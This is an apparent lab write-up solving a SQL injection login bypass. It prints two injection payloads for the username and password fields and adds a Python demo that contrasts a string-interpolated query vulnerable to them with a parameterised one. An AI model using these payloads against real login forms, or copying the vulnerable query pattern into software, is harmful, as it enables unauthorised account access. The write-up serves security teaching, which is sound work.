02 Lab: SQL injection vulnerability allowing login bypass
Objective
This lab contains a SQL injection vulnerability in the login function.
To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.
Solution
We modify the username field, using the value administrator'-- . The single quote closes the string literal and the -- turns the rest of the query, including the password check, into a comment, so we can access the administration panel.
SELECT * FROM USERS WHERE username = '$user' and password = '$password'
$usuario = "administrator'-- "
SELECT * FROM USERS WHERE username = 'administrator'--' and password = '$password'

Alternative
We set the username and password parameters to the values administrator and 'OR'1'='1'-- respectively. The password check then becomes '' OR '1'='1', which is always true.
$usuario = "administrator"
$contraseña = "'OR'1'='1'--"
SELECT * FROM USERS WHERE username = 'administrator' and password = '' OR '1'='1'--
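To show why both payloads above work, and what closes the hole, here is an added example that is not part of the lab or of the write-up. It runs the lab's query shape against a constructed in-memory SQLite table (sample credentials, not the lab's) first with string interpolation and then with bound parameters.

```python
import sqlite3

# Constructed in-memory users table standing in for the lab's database;
# the credentials are sample values, not the lab's.
CONN = sqlite3.connect(":memory:")
CONN.execute("CREATE TABLE users (username TEXT, password TEXT)")
CONN.executemany("INSERT INTO users VALUES (?, ?)",
                 [("administrator", "s3cret-admin"), ("wiener", "peter")])
CONN.commit()


def login_vulnerable(user, password):
    """Builds the query by string interpolation, like the lab's
    SELECT * FROM USERS WHERE username = '$user' and password = '$password'.
    Returns the username the query matched, or None."""
    query = (f"SELECT username FROM users WHERE username = '{user}' "
             f"AND password = '{password}'")
    row = CONN.execute(query).fetchone()
    return row[0] if row else None


def login_safe(user, password):
    """Same lookup with bound parameters: the driver passes the values
    separately from the SQL text, so a quote or -- in the input can never
    close the string literal or comment out the password check."""
    row = CONN.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (user, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    # Payload 1 from the write-up: comment out the password check.
    print(login_vulnerable("administrator'-- ", "whatever"))   # administrator
    # Payload 2: make the WHERE clause always true via OR '1'='1'.
    print(login_vulnerable("administrator", "'OR'1'='1'--"))   # administrator
    # The parameterised version treats both payloads as plain strings.
    print(login_safe("administrator'-- ", "whatever"))         # None
    print(login_safe("administrator", "'OR'1'='1'--"))         # None
    print(login_safe("administrator", "s3cret-admin"))         # administrator
```

Note that the second payload makes the query match every row and fetchone() simply returns the first one; which account you land in depends on row order, not on the username you supplied.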